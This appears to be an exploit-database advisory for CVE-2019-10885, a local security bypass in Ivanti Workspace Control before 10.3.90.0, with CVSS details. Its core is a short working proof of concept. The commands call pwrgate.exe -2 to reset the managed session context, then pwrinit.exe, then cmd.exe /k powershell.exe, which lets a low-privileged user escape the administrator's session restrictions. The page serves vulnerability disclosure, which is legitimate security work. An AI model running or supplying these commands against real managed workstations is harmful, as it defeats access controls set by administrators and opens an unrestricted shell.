Ivanti Workspace Manager Security Bypass

2020.03.19
Credit: Juan Sacco
Risk: Low
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Rem Remarks CVE-2019-10885 - 0day <jsacco@exploitpack.com> Rem An issue was discovered in Ivanti Workspace Control before 10.3.90.0. Local authenticated Rem users with low privileges in a Workspace Control managed session can bypass Workspace Control Rem security features configured for this session by resetting the session context. "%PROGRAMFILES(X86)%\RES Software\Workspace Manager\pwrgate.exe -2" "%PROGRAMFILES(X86)%\RES Software\Workspace Manager\pwrinit.exe" cmd.exe /k powershell.exe


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top